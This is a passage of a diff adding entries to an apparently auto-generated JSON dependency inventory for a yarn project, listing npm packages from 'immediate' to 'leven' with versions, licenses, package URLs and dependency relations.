}, + { + "ID": "immediate@3.3.0", + "Name": "immediate", + "Identifier": { + "PURL": "pkg:npm/immediate@3.3.0", + "UID": "fa3d37f885cc500b" + }, + "Version": "3.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6009, + "EndLine": 6012 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "import-fresh@3.3.1", + "Name": "import-fresh", + "Identifier": { + "PURL": "pkg:npm/import-fresh@3.3.1", + "UID": "7309239ae128ef70" + }, + "Version": "3.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "parent-module@1.0.1", + "resolve-from@4.0.0" + ], + "Locations": [ + { + "StartLine": 6014, + "EndLine": 6020 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "imurmurhash@0.1.4", + "Name": "imurmurhash", + "Identifier": { + "PURL": "pkg:npm/imurmurhash@0.1.4", + "UID": "61a5b9b8d8383da3" + }, + "Version": "0.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6030, + "EndLine": 6033 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "indent-string@4.0.0", + "Name": "indent-string", + "Identifier": { + "PURL": "pkg:npm/indent-string@4.0.0", + "UID": "1804170b4224521d" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6035, + "EndLine": 6038 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "inflight@1.0.6", + "Name": "inflight", + "Identifier": { + "PURL": "pkg:npm/inflight@1.0.6", + "UID": "b8032e5a5e24ebc4" + }, + "Version": "1.0.6", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "once@1.4.0", + "wrappy@1.0.2" + ], + "Locations": [ + { + "StartLine": 6045, + "EndLine": 6051 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "inherits@2.0.4", + "Name": "inherits", + "Identifier": { + "PURL": "pkg:npm/inherits@2.0.4", + "UID": "f85e9f5187c9f23c" + }, + "Version": "2.0.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6053, + "EndLine": 6056 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ini@1.3.8", + "Name": "ini", + "Identifier": { + "PURL": "pkg:npm/ini@1.3.8", + "UID": "1e67cd339256fa3" + }, + "Version": "1.3.8", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6061, + "EndLine": 6064 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ini@5.0.0", + "Name": "ini", + "Identifier": { + "PURL": "pkg:npm/ini@5.0.0", + "UID": "3d317573d7eb628b" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6058, + "EndLine": 6059 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "init-package-json@8.2.2", + "Name": "init-package-json", + "Identifier": { + "PURL": "pkg:npm/init-package-json@8.2.2", + "UID": "d882df9e583c564e" + }, + "Version": "8.2.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/package-json@7.0.1", + "npm-package-arg@13.0.1", + "promzard@2.0.0", + "read@4.1.0", + "semver@7.7.3", + "validate-npm-package-license@3.0.4", + "validate-npm-package-name@6.0.2" + ], + "Locations": [ + { + "StartLine": 6066, + "EndLine": 6075 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "invariant@2.2.4", + "Name": "invariant", + "Identifier": { + "PURL": "pkg:npm/invariant@2.2.4", + "UID": "c11a7588fab7cce2" + }, + "Version": "2.2.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "loose-envify@1.4.0" + ], + "Locations": [ + { + "StartLine": 6091, + "EndLine": 6096 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ip-address@10.0.1", + "Name": "ip-address", + "Identifier": { + "PURL": "pkg:npm/ip-address@10.0.1", + "UID": "48c2ae1155dce8d7" + }, + "Version": "10.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6098, + "EndLine": 6101 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ip-regex@5.0.0", + "Name": "ip-regex", + "Identifier": { + "PURL": "pkg:npm/ip-regex@5.0.0", + "UID": "6238bf80a8b151ca" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6103, + "EndLine": 6104 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-arguments@1.2.0", + "Name": "is-arguments", + "Identifier": { + "PURL": "pkg:npm/is-arguments@1.2.0", + "UID": "f70b301910fbc57" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bound@1.0.4", + "has-tostringtag@1.0.2" + ], + "Locations": [ + { + "StartLine": 6106, + "EndLine": 6112 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-arrayish@0.2.1", + "Name": "is-arrayish", + "Identifier": { + "PURL": "pkg:npm/is-arrayish@0.2.1", + "UID": "73b6a7bd98d7c390" + }, + "Version": "0.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6123, + "EndLine": 6126 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-arrayish@0.3.4", + "Name": "is-arrayish", + "Identifier": { + "PURL": "pkg:npm/is-arrayish@0.3.4", + "UID": "9f65c4056fbec95f" + }, + "Version": "0.3.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6128, + "EndLine": 6131 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-callable@1.2.7", + "Name": "is-callable", + "Identifier": { + "PURL": "pkg:npm/is-callable@1.2.7", + "UID": "8edf74a14bcfb9a9" + }, + "Version": "1.2.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6159, + "EndLine": 6162 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-cidr@6.0.1", + "Name": "is-cidr", + "Identifier": { + "PURL": "pkg:npm/is-cidr@6.0.1", + "UID": "3f12857d7fa9d4d" + }, + "Version": "6.0.1", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cidr-regex@5.0.1" + ], + "Locations": [ + { + "StartLine": 6164, + "EndLine": 6167 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-core-module@2.16.1", + "Name": "is-core-module", + "Identifier": { + "PURL": "pkg:npm/is-core-module@2.16.1", + "UID": "435a86280b629497" + }, + "Version": "2.16.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hasown@2.0.2" + ], + "Locations": [ + { + "StartLine": 6169, + "EndLine": 6174 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-docker@2.2.1", + "Name": "is-docker", + "Identifier": { + "PURL": "pkg:npm/is-docker@2.2.1", + "UID": "7150646db896876c" + }, + "Version": "2.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6193, + "EndLine": 6196 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-extglob@2.1.1", + "Name": "is-extglob", + "Identifier": { + "PURL": "pkg:npm/is-extglob@2.1.1", + "UID": "deb196edf14c0a70" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6198, + "EndLine": 6201 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-fullwidth-code-point@1.0.0", + "Name": "is-fullwidth-code-point", + "Identifier": { + "PURL": "pkg:npm/is-fullwidth-code-point@1.0.0", + "UID": "9aba434413472fd3" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "number-is-nan@1.0.1" + ], + "Locations": [ + { + "StartLine": 6210, + "EndLine": 6215 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-fullwidth-code-point@3.0.0", + "Name": "is-fullwidth-code-point", + "Identifier": { + "PURL": "pkg:npm/is-fullwidth-code-point@3.0.0", + "UID": "6d041b7467da170a" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6222, + "EndLine": 6225 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-generator-function@1.1.2", + "Name": "is-generator-function", + "Identifier": { + "PURL": "pkg:npm/is-generator-function@1.1.2", + "UID": "882691e6a46f62a7" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bound@1.0.4", + "generator-function@2.0.1", + "get-proto@1.0.1", + "has-tostringtag@1.0.2", + "safe-regex-test@1.1.0" + ], + "Locations": [ + { + "StartLine": 6232, + "EndLine": 6241 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-glob@4.0.3", + "Name": "is-glob", + "Identifier": { + "PURL": "pkg:npm/is-glob@4.0.3", + "UID": "5dc7ed61f2b84896" + }, + "Version": "4.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-extglob@2.1.1" + ], + "Locations": [ + { + "StartLine": 6243, + "EndLine": 6248 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-interactive@1.0.0", + "Name": "is-interactive", + "Identifier": { + "PURL": "pkg:npm/is-interactive@1.0.0", + "UID": "a6d2805cdb60bd1b" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6250, + "EndLine": 6253 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-number@7.0.0", + "Name": "is-number", + "Identifier": { + "PURL": "pkg:npm/is-number@7.0.0", + "UID": "77de49662ba3b280" + }, + "Version": "7.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6278, + "EndLine": 6281 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-plain-obj@1.1.0", + "Name": "is-plain-obj", + "Identifier": { + "PURL": "pkg:npm/is-plain-obj@1.1.0", + "UID": "6af6d7702b0e7e5c" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6288, + "EndLine": 6291 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-plain-obj@2.1.0", + "Name": "is-plain-obj", + "Identifier": { + "PURL": "pkg:npm/is-plain-obj@2.1.0", + "UID": "99fa369ae472baac" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6293, + "EndLine": 6296 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-regex@1.2.1", + "Name": "is-regex", + "Identifier": { + "PURL": "pkg:npm/is-regex@1.2.1", + "UID": "646dadb40119e3" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bound@1.0.4", + "gopd@1.2.0", + "has-tostringtag@1.0.2", + "hasown@2.0.2" + ], + "Locations": [ + { + "StartLine": 6298, + "EndLine": 6306 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-stream@1.1.0", + "Name": "is-stream", + "Identifier": { + "PURL": "pkg:npm/is-stream@1.1.0", + "UID": "31724f830e0ef132" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6320, + "EndLine": 6323 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-stream@2.0.1", + "Name": "is-stream", + "Identifier": { + "PURL": "pkg:npm/is-stream@2.0.1", + "UID": "8ca5bc1e2b109e0c" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6325, + "EndLine": 6328 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-typed-array@1.1.15", + "Name": "is-typed-array", + "Identifier": { + "PURL": "pkg:npm/is-typed-array@1.1.15", + "UID": "53d4910600f816a5" + }, + "Version": "1.1.15", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "which-typed-array@1.1.19" + ], + "Locations": [ + { + "StartLine": 6347, + "EndLine": 6352 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-unicode-supported@0.1.0", + "Name": "is-unicode-supported", + "Identifier": { + "PURL": "pkg:npm/is-unicode-supported@0.1.0", + "UID": "37f345fd7eacf5a5" + }, + "Version": "0.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6354, + "EndLine": 6357 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-wsl@2.2.0", + "Name": "is-wsl", + "Identifier": { + "PURL": "pkg:npm/is-wsl@2.2.0", + "UID": "17bde44b63e6216d" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-docker@2.2.1" + ], + "Locations": [ + { + "StartLine": 6391, + "EndLine": 6396 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "isarray@1.0.0", + "Name": "isarray", + "Identifier": { + "PURL": "pkg:npm/isarray@1.0.0", + "UID": "a9cb206f88f378ca" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6403, + "EndLine": 6406 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "isexe@2.0.0", + "Name": "isexe", + "Identifier": { + "PURL": "pkg:npm/isexe@2.0.0", + "UID": "378303592b32e7d1" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6408, + "EndLine": 6411 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "isexe@3.1.1", + "Name": "isexe", + "Identifier": { + "PURL": "pkg:npm/isexe@3.1.1", + "UID": "562290954cc277f0" + }, + "Version": "3.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6413, + "EndLine": 6414 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "isomorphic-fetch@2.2.1", + "Name": "isomorphic-fetch", + "Identifier": { + "PURL": "pkg:npm/isomorphic-fetch@2.2.1", + "UID": "f638d59d12ec7766" + }, + "Version": "2.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "node-fetch@1.7.3", + "whatwg-fetch@3.6.20" + ], + "Locations": [ + { + "StartLine": 6416, + "EndLine": 6422 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "istanbul-lib-coverage@3.2.2", + "Name": "istanbul-lib-coverage", + "Identifier": { + "PURL": "pkg:npm/istanbul-lib-coverage@3.2.2", + "UID": "8e1b152e1297d50e" + }, + "Version": "3.2.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6424, + "EndLine": 6427 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "istanbul-lib-instrument@5.2.1", + "Name": "istanbul-lib-instrument", + "Identifier": { + "PURL": "pkg:npm/istanbul-lib-instrument@5.2.1", + "UID": "e3181a0242a2430b" + }, + "Version": "5.2.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/parser@7.28.4", + "@istanbuljs/schema@0.1.3", + "istanbul-lib-coverage@3.2.2", + "semver@6.3.1" + ], + "Locations": [ + { + "StartLine": 6429, + "EndLine": 6438 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jackspeak@3.4.3", + "Name": "jackspeak", + "Identifier": { + "PURL": "pkg:npm/jackspeak@3.4.3", + "UID": "da89f5085cb684f2" + }, + "Version": "3.4.3", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/cliui@8.0.2" + ], + "Locations": [ + { + "StartLine": 6489, + "EndLine": 6496 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jackspeak@4.1.1", + "Name": "jackspeak", + "Identifier": { + "PURL": "pkg:npm/jackspeak@4.1.1", + "UID": "b2a3c04f65446070" + }, + "Version": "4.1.1", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/cliui@8.0.2" + ], + "Locations": [ + { + "StartLine": 6498, + "EndLine": 6501 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jest-environment-node@29.7.0", + "Name": "jest-environment-node", + "Identifier": { + "PURL": "pkg:npm/jest-environment-node@29.7.0", + "UID": "f7a7b2d679110c89" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/environment@29.7.0", + "@jest/fake-timers@29.7.0", + "@jest/types@29.6.3", + "@types/node@24.7.0", + "jest-mock@29.7.0", + "jest-util@29.7.0" + ], + "Locations": [ + { + "StartLine": 6611, + "EndLine": 6621 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jest-get-type@29.6.3", + "Name": "jest-get-type", + "Identifier": { + "PURL": "pkg:npm/jest-get-type@29.6.3", + "UID": "3d25d06fccf9039b" + }, + "Version": "29.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6623, + "EndLine": 6626 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jest-haste-map@29.7.0", + "Name": "jest-haste-map", + "Identifier": { + "PURL": "pkg:npm/jest-haste-map@29.7.0", + "UID": "82aaf45fd73e650d" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/types@29.6.3", + "@types/graceful-fs@4.1.9", + "@types/node@24.7.0", + "anymatch@3.1.3", + "fb-watchman@2.0.2", + "graceful-fs@4.2.11", + "jest-regex-util@29.6.3", + "jest-util@29.7.0", + "jest-worker@29.7.0", + "micromatch@4.0.8", + "walker@1.0.8" + ], + "Locations": [ + { + "StartLine": 6628, + "EndLine": 6645 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jest-message-util@29.7.0", + "Name": "jest-message-util", + "Identifier": { + "PURL": "pkg:npm/jest-message-util@29.7.0", + "UID": "c1640d65e70f141b" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/code-frame@7.27.1", + "@jest/types@29.6.3", + "@types/stack-utils@2.0.3", + "chalk@4.1.2", + "graceful-fs@4.2.11", + "micromatch@4.0.8", + "pretty-format@29.7.0", + "slash@3.0.0", + "stack-utils@2.0.6" + ], + "Locations": [ + { + "StartLine": 6665, + "EndLine": 6678 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jest-mock@29.7.0", + "Name": "jest-mock", + "Identifier": { + "PURL": "pkg:npm/jest-mock@29.7.0", + "UID": "b6754912f87402ef" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/types@29.6.3", + "@types/node@24.7.0", + "jest-util@29.7.0" + ], + "Locations": [ + { + "StartLine": 6680, + "EndLine": 6687 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jest-regex-util@29.6.3", + "Name": "jest-regex-util", + "Identifier": { + "PURL": "pkg:npm/jest-regex-util@29.6.3", + "UID": "71a4c52851f7f110" + }, + "Version": "29.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6694, + "EndLine": 6697 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jest-util@29.7.0", + "Name": "jest-util", + "Identifier": { + "PURL": "pkg:npm/jest-util@29.7.0", + "UID": "2ee2d6dc7124e4a5" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/types@29.6.3", + "@types/node@24.7.0", + "chalk@4.1.2", + "ci-info@3.9.0", + "graceful-fs@4.2.11", + "picomatch@2.3.1" + ], + "Locations": [ + { + "StartLine": 6803, + "EndLine": 6813 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jest-validate@29.7.0", + "Name": "jest-validate", + "Identifier": { + "PURL": "pkg:npm/jest-validate@29.7.0", + "UID": "893d04b518c1d1a" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/types@29.6.3", + "camelcase@6.3.0", + "chalk@4.1.2", + "jest-get-type@29.6.3", + "leven@3.1.0", + "pretty-format@29.7.0" + ], + "Locations": [ + { + "StartLine": 6815, + "EndLine": 6825 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jest-worker@29.7.0", + "Name": "jest-worker", + "Identifier": { + "PURL": "pkg:npm/jest-worker@29.7.0", + "UID": "45d289ca974a7f22" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/node@24.7.0", + "jest-util@29.7.0", + "merge-stream@2.0.0", + "supports-color@8.1.1" + ], + "Locations": [ + { + "StartLine": 6841, + "EndLine": 6849 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "js-tokens@4.0.0", + "Name": "js-tokens", + "Identifier": { + "PURL": "pkg:npm/js-tokens@4.0.0", + "UID": "eff759740d1dab2d" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6872, + "EndLine": 6875 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "js-yaml@3.14.1", + "Name": "js-yaml", + "Identifier": { + "PURL": "pkg:npm/js-yaml@3.14.1", + "UID": "63902cab6028fa26" + }, + "Version": "3.14.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "argparse@1.0.10", + "esprima@4.0.1" + ], + "Locations": [ + { + "StartLine": 6877, + "EndLine": 6883 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "js-yaml@4.1.0", + "Name": "js-yaml", + "Identifier": { + "PURL": "pkg:npm/js-yaml@4.1.0", + "UID": "7704269816196759" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "argparse@2.0.1" + ], + "Locations": [ + { + "StartLine": 6885, + "EndLine": 6890 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jsc-safe-url@0.2.4", + "Name": "jsc-safe-url", + "Identifier": { + "PURL": "pkg:npm/jsc-safe-url@0.2.4", + "UID": "fddbd30a1afb9f3e" + }, + "Version": "0.2.4", + "Licenses": [ + "0BSD" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6892, + "EndLine": 6895 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jsesc@3.1.0", + "Name": "jsesc", + "Identifier": { + "PURL": "pkg:npm/jsesc@3.1.0", + "UID": "216dba74c18659e0" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6897, + "EndLine": 6900 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "json-parse-even-better-errors@2.3.1", + "Name": "json-parse-even-better-errors", + "Identifier": { + "PURL": "pkg:npm/json-parse-even-better-errors@2.3.1", + "UID": "40027601eb598c6e" + }, + "Version": "2.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6907, + "EndLine": 6910 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "json-parse-even-better-errors@4.0.0", + "Name": "json-parse-even-better-errors", + "Identifier": { + "PURL": "pkg:npm/json-parse-even-better-errors@4.0.0", + "UID": "9fb08d1d04686211" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6912, + "EndLine": 6913 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "json-stringify-nice@1.1.4", + "Name": "json-stringify-nice", + "Identifier": { + "PURL": "pkg:npm/json-stringify-nice@1.1.4", + "UID": "ab6eaa03ee25e827" + }, + "Version": "1.1.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6936, + "EndLine": 6939 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "json5@2.2.3", + "Name": "json5", + "Identifier": { + "PURL": "pkg:npm/json5@2.2.3", + "UID": "ca4c4fa971359a2c" + }, + "Version": "2.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6941, + "EndLine": 6944 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jsonfile@4.0.0", + "Name": "jsonfile", + "Identifier": { + "PURL": "pkg:npm/jsonfile@4.0.0", + "UID": "894825b005c1f64d" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6946, + "EndLine": 6951 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jsonfile@6.2.0", + "Name": "jsonfile", + "Identifier": { + "PURL": "pkg:npm/jsonfile@6.2.0", + "UID": "6899cbb087af522e" + }, + "Version": "6.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "universalify@2.0.1" + ], + "Locations": [ + { + "StartLine": 6953, + "EndLine": 6960 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "jsonparse@1.3.1", + "Name": "jsonparse", + "Identifier": { + "PURL": "pkg:npm/jsonparse@1.3.1", + "UID": "72c4907201d50031" + }, + "Version": "1.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6967, + "EndLine": 6970 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "just-diff@6.0.2", + "Name": "just-diff", + "Identifier": { + "PURL": "pkg:npm/just-diff@6.0.2", + "UID": "7c9cb0f3d1423e86" + }, + "Version": "6.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6987, + "EndLine": 6990 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "just-diff-apply@5.5.0", + "Name": "just-diff-apply", + "Identifier": { + "PURL": "pkg:npm/just-diff-apply@5.5.0", + "UID": "6cec619a7cf7d94b" + }, + "Version": "5.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6982, + "EndLine": 6985 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "kind-of@6.0.3", + "Name": "kind-of", + "Identifier": { + "PURL": "pkg:npm/kind-of@6.0.3", + "UID": "a28eca7c06e76a64" + }, + "Version": "6.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6999, + "EndLine": 7002 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "kleur@3.0.3", + "Name": "kleur", + "Identifier": { + "PURL": "pkg:npm/kleur@3.0.3", + "UID": "5d28f2b81c6668f8" + }, + "Version": "3.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7011, + "EndLine": 7014 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "launch-editor@2.11.1", + "Name": "launch-editor", + "Identifier": { + "PURL": "pkg:npm/launch-editor@2.11.1", + "UID": "6acbf1ba1b1a95a6" + }, + "Version": "2.11.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "picocolors@1.1.1", + "shell-quote@1.8.3" + ], + "Locations": [ + { + "StartLine": 7016, + "EndLine": 7022 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "leven@3.1.0", + "Name": "leven", + "Identifier": { + "PURL": "pkg:npm/leven@3.1.0", + "UID": "a1960e8cab03e200" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + 